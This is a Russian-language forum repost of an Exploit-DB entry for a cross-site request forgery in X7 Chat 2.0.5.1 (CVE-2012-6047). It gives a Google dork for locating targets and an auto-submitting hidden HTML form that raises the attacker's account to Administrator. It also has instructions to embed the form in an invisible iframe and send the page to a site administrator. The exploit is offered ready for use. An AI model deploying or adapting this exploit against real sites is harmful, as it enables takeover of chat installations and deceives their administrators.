Exploit X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18850
Проверка EDB
  1. Пройдено
Автор
DENNSPEC
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2012-6047
Дата публикации
2012-05-09
Код:
# Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit
# Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5"
# Date: 09.05.2012
# Author: DennSpec
# Software Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
# Version: <= 2.0.5.1

firstly, register and give a username.

(frame.html in path of your main html page)

<html>
    <body onload="document.xform.submit();">
        <form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
            <input type="hidden" name="username" value="YOURUSERNAME" />
            <input type="hidden" name="usergroup" value="Administrator" />
        </form>
    </body>
</html>

Replace http://xxxxxxxxx.com/x7path/ to your target url. Dont forget replace YOURUSERNAME to YOURUSERNAME.

add this code to inside body tag of main html page:
<iframe style="display:none;" src="frame.html"></iframe>

and... upload main page and frame.html . Send main page url to any administrator.
 
Источник
www.exploit-db.com

Похожие темы